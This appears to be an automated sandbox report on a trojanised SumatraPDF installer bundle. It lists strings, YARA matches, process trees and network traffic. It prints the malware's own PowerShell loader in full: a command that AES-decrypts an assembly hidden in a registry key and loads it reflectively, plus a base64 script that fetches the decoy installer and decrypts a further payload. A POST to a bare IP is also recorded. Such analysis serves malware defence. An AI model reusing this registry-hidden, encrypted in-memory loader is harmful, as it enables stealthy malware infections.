      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/%s)
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/7a19622d5ad35702dad2694cca4873693e88bc4e)
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/7a19622d5ad35702dad2694cca4873693e88bc4egit
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussions/2316
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://http://https://translate.google.com/?sl=auto&tl=$
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://sectigo.com/CPS0
      Source: i2wBlKtxrM.exeString found in binary or memory: https://www.certum.pl/CPS0
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.deepl.com/translator#en/$
      Source: i2wBlKtxrM.exeString found in binary or memory: https://www.ssl.com/repository0
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/UninstallStringhttps://www.sumatrapdfreader.org/docs/Version-histor
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/dl/prerel/PRE_RELEASE_VER/SumatraPDF-prerel
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/docs/Corrupted-installation
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/docs/How-to-contribute-translation.htmlhttps://www.google.com/searc
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/docs/Installer-cmd-line-arguments
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/docs/Submit-crash-report.htmlFailed
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/download-free-pdf-viewer
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/manual.htmlSumatraPDF
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/settings/settings3-4-6.html
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/settings/settings3-4-6.html8.33
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/update-check-rel.txt
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/update-check-rel.txtLatestInstaller64
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org0
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 494Expect: 100-continueConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: www.sumatrapdfreader.org
      Source: unknownHTTPS traffic detected: 104.26.8.244:443 -> 192.168.0.90:49827 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: amsi64_14196.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 6416, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      .NET source code contains very large strings
      Source: i2wBlKtxrM.exe, MainApp.csLong String: Length: 1093768
      Source: i2wBlKtxrM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: amsi64_14196.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 6416, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess Stats: CPU usage > 98%
      Source: i2wBlKtxrM.exe, 00000004.00000000.17016029626.000000000706D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameinstaller.exe@ vs i2wBlKtxrM.exe
      Source: i2wBlKtxrM.exeBinary or memory string: OriginalFilenameinstaller.exe@ vs i2wBlKtxrM.exe
      Source: i2wBlKtxrM.exeStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_BITMAP type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: i2wBlKtxrM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\i2wBlKtxrM.exe C:\Users\user\Desktop\i2wBlKtxrM.exe
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe "C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe"
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe" -command "$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]3,173,118,126,231,161,139,192,229,141,204,156,132,100,48,106,235,67,30,141,248,153,154,213,216,50,229,134,16,171,109,238);$A.IV=@([byte]201,234,4,140,115,200,164,199,43,168,227,197,101,4,86,9);$F=(get-itemproperty 'HKCU:\Software\Classes\rfg1dcnqkaz').'(default)';[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[kemCiD76HlG1Vs2OPA8cqjGCkrCqhXCzjexLEW2LxjRUMlEqNPHprYoTm9lbu6vtunojB72JkixZX3sSwfGVTdwCSSzECXsoGC.k71MR3w83P167odlfS1wNy2AFqYTQl9Bufz4ZvpO0Mceu64ndEff]::KEqMIs3CK5uPwc0wNJHou0Kdkh_iB1('CW2TM3BL19P97XCM5KU1REEJ00X0IVIU');
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe "C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe" Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile created: C:\Users\user\Documents\20230614Jump to behavior
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hicmcvjw.wpz.ps1Jump to behavior
      Source: classification engineClassification label: mal60.troj.evad.winEXE@11/16@2/3
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: i2wBlKtxrM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\0715c4fdaf0442fe6a5f74fe860f1fef\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\0715c4fdaf0442fe6a5f74fe860f1fef\mscorlib.ni.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\0715c4fdaf0442fe6a5f74fe860f1fef\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\0715c4fdaf0442fe6a5f74fe860f1fef\mscorlib.ni.dll
      Source: i2wBlKtxrM.exe, MainApp.csBase64 encoded string: 'JHA9J3N1bXBkZi1pbnN0YWxsZXIteDY0LWJ1bmRsZS5leGUnOyhOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHBzOi8vd3d3LnN1bWF0cmFwZGZyZWFkZXIub3JnL2RsL3JlbC8zLjQuNi9TdW1hdHJhUERGLTMuNC42LTY0LWluc3RhbGwuZXhlJywkcCk7U3RhcnQtUHJvY2VzcyAkcDskTT0kZmFsc2U7TmV3LU9iamVjdCBTeXN0ZW0uVGhyZWFkaW5nLk11dGV4KCR0cnVlLCdRQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWk5IUnNYQTVaUzZLQUtaWFpEOU9rVXhWRUNLWVJlTUROQ296SlFPWFFQRUtUWGUzREVhTVZPRXlqNFZDQjBYRVBpaFpzQlpUeU1OUU1LMUdPQ2dWT1NLWkNYWFoyVldfQlVWQycsW3JlZl0kTSk7aWYoJE0peyRBPU5ldy1PYmplY3QgU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNDcnlwdG9TZXJ2aWNlUHJvdmlkZXI7JEEuS2V5PUAoW2J5dGVdMTA3LDEwNywxODgsMTQyLDE1NCwxMDQsMTEsMTMzLDE5Nyw2NywxODMsNTgsMjMwLDYzLDM5LDEyNyw4NSwxMTksMzIsMjksMjIyLDIwLDc1LDEwOCwxOTcsMjM0LDIsMTg4LDYzLDEsMjIxLDY0KTskQS5JVj1AKFtieXRlXTI3LDU4LDE4LDIyOSwyMzgsNzUsMjM5LDE4LDI0NSwzOSwyOSwyMjEsMjE3LDIzMSwzNCw1Nik7JEY9W0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCdkNGMydGsvQ3dvQWhFaDZ0N3QzeHhiejdDb3dRbE9IdW9YT241dkZIaEZWT1dPVUp4VkVENGk1L3ZCM0w2bU16M0RIM0FCMkE0dGJkVUVVL3dDMGRyc3ZtbkIvVkdyM2RPTks1OHVGQjBFcUhnNHJCUmtwZjNkb3k4QzUzTGs2Qkd6bnJMdUhPL2dHdFJVbUNzU1NtNG5RUjFVOTUwVFVVOW84alBZVjJ3TWc4Z21ic3RSSlBFRTBVTGlDOWxBa2ZxZEM5di8wL3RkVXVLcUxwYjU3OXBUTmh6WHlvNHBHYWIrRGU2MnBMVld6OFptS3ZsdUtkN0tpU1lYeEY5RGtLd3g5QnUwWUJEWk16RGg3VFhqZk1BdHl0TUw4aHFnQlZwTjhtblBiQkZncFJKRmNhVldXTW9QdCsxTTVhZjEraTdmUEhyK28wUTNvbW56c2VWMzNOR04rY0I3K2ZOcHE2VjhWYzRiRHhITzlpYmxUT2FST0pHTWduNC9rLysrZkpoRnQwRW1Ld3lDdEdpK2lsWlJZTUxKak82ZTFpWHFKL1pOaUo1czR0L1NMWndvR2pEK1dDdndrOHVSM2E5dFBkZkh0a1hCRERpNllXWm1yQ2RyUW5VS0pWTG1BUTZ3bCtkRm10enB6Z0FJVHBTdkVQUjJiT0dEdVVhbHFJVjYvMEd3ZTVCclBscEw4RVBzekxFOUo1R2t3amxiOHNOc2JBNXpTbm92cFpPUGRCOC9pZDBzU1dWYTUwUTNBdmpNODhab0hLWUlSbE9YVEpLOGd6UzhBbzVESUFrWlNpdDdoRCtmYTNKejg5NEhoME9XTlhYdjNvWTNDNTJEL3BZMlBkNEpTWk9mdlNVYWVJaUlPb0pwbW5Ybzhyc1ZYRFdXS2hqaGd2OGhqQlRHRUNNQUVWUzFjb2RSSE9SQ0huaGRjY2dYSExRdmFJRjduc0gwNzZxbkFSNFV0YS85TEJSZjBrbjY1eDFJK2tTdnhtOGw0MXpWb2lJcnVsQ3NvMnp6U2xBbWE4ei96ck9RUzhPQXI5SDEwdnYvREpnTm9KU0FoYnpCZW0xbUh4TzBvWG5hcGNEQ3FmY0tQNm5ON2tJVld5WWw3QjF4UWNpT0VmamUraFhtajV1OFJZckRZWGxNVnJOam1Ba0luRXJtMDBXMEwxMkJwUmJGY0ltMVVQQkNZTXpBWUk4QUczOThDN0hDNWhyU2J5S3o5ZG9vNVdJRzA4MkdONG9PYXpycFBwTVNSWFEwT1ZZZy9GTDZudngzaVhUMGt5M2VOYTQ1dUt5MU1mRFMvS0thZE5jdVNRSWxGTktnTytnNlJ1dmsvYkZqOHdBZXNXQjdiVDRUTUx0V0pqdFdlMXEraHNCQ0hEU1VlYzB3ZkFyWTBvY0dyTlRvdHBUTUFHSzBUUnh1N0loRkFCeW5NQWxJRXVJUkxhbzRQbkhtUTJOSEZ1QUVLdUI5VTVOTmdROFN4VUF6OFJuanBqRGlicVVYSEc1TzRnOUtLZDZDc2xqOFRvQVFocmVtQmhzcTBxUi8xWWcwUXBIZnJmalFQOVBsYTZJNlFUdm9YeURzSWFveTc5MmFxWWdVTlk2NlE0UWVTdnc1UjIrN1pFam1ORVU2Nld0RGNvc2NodWNLUk00UGFlMnNOaG5JVDVBb1ZObklMb0szVUlZeDM1dEZVd05RTWh0QWlTVHR4K3lxOE5VbkZKYUdCVzVCTlVvRDhWS09sVG5IRmVkTEg1aTRhSkpqZnBVQVRaVUhzWGExTzJKR20veGFqcEhIeHlxTndjK3dHRDg5U3VnK2dWWURIa1hRMWl2aFZtZGpZaktYODRwNUt6WXdXV3VEdnE0Uk1uVGE2WnlNVW5xQVlHUFpwY0FGNFZYYWFGSEdIemRLR1hwYUxNWVh2c0JtQnV0Vm85YVJSTlY3SFZ3bTVMZmtkcFIvelhOQ0hrbTdNYzk2dlliYkU3SjJ2aGZiWUJqSWtwN3JHbndST1NuaGMrSnA2bU1XL2E0R21yOFdidER5MUdiQnphQUloS3h4RFg0Y0ppKzJWMis
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeMutant created: \Sessions\1\BaseNamedObjects\QABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZNHRsXA5ZS6KAKZXZD9OkUxVECKYReMDNCozJQOXQPEKTXe3DEaMVOEyj4VCB0XEPihZsBZTyMNQMK1GOCgVOSKZCXXZ2VW_BUVC
      Source: sumpdf-installer-x64-bundle.exeString found in binary or memory: del SumatraPDF. cn: SumatraPDF co:Installazione di SumatraPDF micca trova. cy:Heb ganfod gosodiad SumatraPDF. cz:Instalace programu SumatraPDF nebyla nalezena. de:SumatraPDF-Installation nicht gefunden. dk:SumatraPDF-installatio
      Source: sumpdf-installer-x64-bundle.exeString found in binary or memory: SumatraPDF. my:Pemasangan SumatraPDF tidak dijumpai. ne:SumatraPDF . nl:SumatraPDF-installatie niet gevonden. nn:SumatraPDF-installeringa blei ikkje funnet. no:SumatraPDF installerin
      Source: sumpdf-installer-x64-bundle.exeString found in binary or memory: SumatraPDF %s my:Installer SumatraPDF %s ne:Sumatrapdf %s nl:SumatraPDF %s installatieprogramma nn:SumatraPDF %s-installerer no:SumatraPDF %s installering pl:Instalator SumatraPDF %s pt:Instalador do SumatraPDF %s ro:Programul
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: i2wBlKtxrM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: i2wBlKtxrM.exeStatic file information: File size 114486352 > 1048576
      Source: i2wBlKtxrM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: i2wBlKtxrM.exeStatic PE information: certificate valid
      Source: i2wBlKtxrM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x21d800
      Source: i2wBlKtxrM.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x6b0e400
      Source: i2wBlKtxrM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa! source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:UsersuserDesktopsumpdf-installer-x64-bundle.exeC:\Program FilesC:\Users\user\DesktopC:\Users\user\Desktop\crashinfoC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmpC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.txtC:\Users\user\Desktop\crashinfo\SumatraPDF.pdbC:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdbC:\Users\user\Desktop\crashinfo\libmupdf.pdbInstallCrashHandler crashDumpPath: 'C:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmp' source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290C0008000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: e.pdb&Qp source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290BFFEF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: -64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\Desktop\crashinfo\libmupdf.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: :%d.pdb.epubRootPageLayout&lt;<<html> source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utilityne.PDBj_: source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: fileDjVufileXPSfilePSfilePDFfileGiffileJpegfilePngfileChmfileJxrfileTgafileBmpfileTifffileJp2fileWebpfileWdpfileHdpfileCbtfileCb7fileCbrfileCbzfileTarfile7ZfileRarfileZipfileEpubdirectoryfileFb2zfileFb2fileTxtfileHTMLfilePalmDocfileMobifoo.epub.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.tarfileHeicfileSvg7z source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
